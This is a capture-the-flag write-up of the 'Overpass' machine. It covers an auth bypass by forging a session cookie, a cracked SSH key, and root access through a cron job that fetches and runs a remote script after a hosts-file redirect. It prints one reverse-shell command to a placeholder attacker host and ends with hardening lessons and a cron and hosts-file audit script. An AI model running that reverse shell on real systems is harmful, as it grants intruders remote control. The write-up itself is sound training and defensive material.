Overpass
This engagement involved exploiting broken authentication logic to bypass login controls, retrieving sensitive SSH credentials, and leveraging a misconfigured cron job to achieve root-level remote code execution.
Reconnaissance
- SSH (OpenSSH)
- HTTP (Apache)
The web application was identified as the primary attack surface.
Authentication Bypass
Client-side JavaScript revealed flawed session handling. The application accepted any value as a valid session token.
SessionToken=exampleCookie
Manually setting this cookie granted access to the admin panel.
Admin Panel Access

Initial Access
An SSH private key was discovered within the admin panel. After cracking its passphrase, access was obtained as user james.
Privilege Escalation
A cron job executed a remote script and piped it directly into bash as root.
By modifying the /etc/hosts file, the domain was redirected to an attacker-controlled server hosting a malicious script.
bash -i >& /dev/tcp/ATTACKER_IP/1234 0>&1
Impact
This attack chain resulted in full system compromise through authentication bypass, credential exposure, and root-level remote code execution via a misconfigured cron job.
- Client-side authentication should never be trusted
- Session tokens must be validated server-side
- Sensitive credentials should not be exposed in web apps
- Cron jobs should never execute remote scripts blindly
- Writable system files (like /etc/hosts) are critical risks
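The last two lessons can be checked mechanically. The script below is an added example, not part of the original write-up: it flags cron lines that pipe a download into a shell, reports a hosts file writable by non-owners, and lists static hosts entries for the fetched domain. The function names, the host names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the write-up: audits copies of a crontab and a
# hosts file for the weaknesses above. All sample data is constructed.

# Print non-comment cron lines that pipe a curl/wget download into a shell.
find_pipe_to_shell() {
    awk '!/^[ \t]*#/ &&
/(curl|wget)[^|]*[|][ \t]*(sudo[ \t]+)?([^ \t|]*\/)?(ba|da|z|k)?sh([ \t]|$)/ {
        print NR ": " $0
    }' "$1"
}

# Succeed if the file is writable by its group or by others.
is_loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ]
}

# Print hosts lines that pin hostname $2 to a static address (overrides DNS).
hosts_entries_for() {
    awk -v h="$2" '!/^[ \t]*#/ {
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^#/) break          # rest of the line is a comment
            if ($i == h) { print; break }
        }
    }' "$1"
}

# --- constructed sample data (hypothetical host names) ---
demo_dir=$(mktemp -d)
cat > "$demo_dir/crontab" <<'EOF'
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
# * * * * * root curl http://old.example.com/x.sh | sh
* * * * * root curl http://updates.example.com/build.sh | bash
EOF
printf '127.0.0.1 localhost\n192.0.2.10 updates.example.com\n' > "$demo_dir/hosts"
chmod 666 "$demo_dir/hosts"

echo "Cron lines piping a download into a shell:"
find_pipe_to_shell "$demo_dir/crontab"
if is_loosely_writable "$demo_dir/hosts"; then
    echo "hosts file is writable by non-owners"
fi
echo "Static hosts entries for the fetched domain:"
hosts_entries_for "$demo_dir/hosts" updates.example.com
rm -rf "$demo_dir"
```

On a live host, point the functions at /etc/crontab, the files under /etc/cron.d and /etc/hosts; any job that must fetch a script should download to a file, verify it against a pinned checksum or signature, and only then run it.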